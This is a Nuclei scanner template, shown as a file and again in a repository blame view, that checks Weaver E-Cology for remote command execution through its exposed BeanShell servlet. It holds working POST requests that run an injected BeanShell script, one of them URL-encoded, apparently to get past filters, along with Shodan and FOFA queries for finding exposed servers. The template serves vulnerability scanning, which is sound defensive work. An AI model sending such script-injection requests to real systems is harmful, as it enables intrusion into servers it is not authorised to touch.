nuclei-templates/http/vulnerabilities/weaver/weaver-ecology-bshservlet-r...

id: weaver-ecology-bshservlet-rce

info:
  name: Weaver E-Cology BeanShell - Remote Command Execution
  author: SleepingBag945
  severity: critical
  description: |
    Weaver BeanShell contains a remote command execution vulnerability in the bsh.servlet.BshServlet program.
  classification:
    cpe: cpe:2.3:a:weaver:e-cology:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 2
    vendor: weaver
    product: e-cology
    shodan-query: ecology_JSessionid
    fofa-query: app="泛微-协同办公OA"
  tags: beanshell,rce,weaver

http:
  - raw:
      - |
        POST /weaver/bsh.servlet.BshServlet HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        bsh.script=print%28%22{{randstr}}%22%29%3B
      - |
        POST /weaver/bsh.servlet.BshServlet HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        %62%73%68%2e%73%63%72%69%70%74=%70%72%69%6e%74%28%22{{randstr}}%22%29%3b

    matchers-condition: and
    matchers:
      - type: regex
        regex:
          - "BeanShell Test Servlet"
          - "(?i)<pre>(\n.*){{randstr}}"
        condition: and

      - type: status
        status:
          - 200
# digest: 4b0a00483046022100958523c3e8a809bd453ca0e38d2996e8d21f775f6fd462beb1c01378ce4555da02210080830614cf091d2944e7d98aa17cbe889a21692e84656680f570b9aa2367092e:922c64590222798bb761d5b6d8e72950
templates update -2 2023-09-14 19:11:38 +00:00			`id: weaver-ecology-bshservlet-rce`
Added some Templates 2023-08-18 03:22:06 +00:00
			`info:`
templates update -2 2023-09-14 19:11:38 +00:00			`name: Weaver E-Cology BeanShell - Remote Command Execution`
Added some Templates 2023-08-18 03:22:06 +00:00			`author: SleepingBag945`
			`severity: critical`
templates update -2 2023-09-14 19:11:38 +00:00			`description: \|`
			`Weaver BeanShell contains a remote command execution vulnerability in the bsh.servlet.BshServlet program.`
Fix classification Fix classification 2024-09-10 09:08:16 +00:00			`classification:`
			`cpe: cpe:2.3:a:weaver:e-cology::::::::`
templates update -2 2023-09-14 19:11:38 +00:00			`metadata:`
templateman update 2023-10-14 11:27:55 +00:00			`verified: true`
TemplateMan Update [Mon Sep 18 12:45:28 UTC 2023] :robot: 2023-09-18 12:45:28 +00:00			`max-request: 2`
Fix classification Fix classification 2024-09-10 09:08:16 +00:00			`vendor: weaver`
			`product: e-cology`
TemplateMan Update [Mon Sep 18 12:45:28 UTC 2023] :robot: 2023-09-18 12:45:28 +00:00			`shodan-query: ecology_JSessionid`
templateman update 2023-10-14 11:27:55 +00:00			`fofa-query: app="泛微-协同办公OA"`
Added some Templates 2023-08-18 03:22:06 +00:00			`tags: beanshell,rce,weaver`

			`http:`
			`- raw:`
			`- \|`
			`POST /weaver/bsh.servlet.BshServlet HTTP/1.1`
			`Host: {{Hostname}}`
			`Content-Type: application/x-www-form-urlencoded`

			`bsh.script=print%28%22{{randstr}}%22%29%3B`
Add missing cpes Added missing cpes 2024-09-10 08:22:50 +00:00			`- \|`
Added some Templates 2023-08-18 03:22:06 +00:00			`POST /weaver/bsh.servlet.BshServlet HTTP/1.1`
			`Host: {{Hostname}}`
			`Content-Type: application/x-www-form-urlencoded`

			`%62%73%68%2e%73%63%72%69%70%74=%70%72%69%6e%74%28%22{{randstr}}%22%29%3b`
Fix classification Fix classification 2024-09-10 09:08:16 +00:00
Added some Templates 2023-08-18 03:22:06 +00:00			`matchers-condition: and`
			`matchers:`
templates update -2 2023-09-14 19:11:38 +00:00			`- type: regex`
			`regex:`
Added some Templates 2023-08-18 03:22:06 +00:00			`- "BeanShell Test Servlet"`
templates update -2 2023-09-14 19:11:38 +00:00			`- "(?i)<pre>(\n.*){{randstr}}"`
			`condition: and`
Added some Templates 2023-08-18 03:22:06 +00:00
			`- type: status`
			`status:`
templateman update 2023-10-14 11:27:55 +00:00			`- 200`
chore: sign templates 🤖 2024-09-12 05:14:01 +00:00			`# digest: 4b0a00483046022100958523c3e8a809bd453ca0e38d2996e8d21f775f6fd462beb1c01378ce4555da02210080830614cf091d2944e7d98aa17cbe889a21692e84656680f570b9aa2367092e:922c64590222798bb761d5b6d8e72950`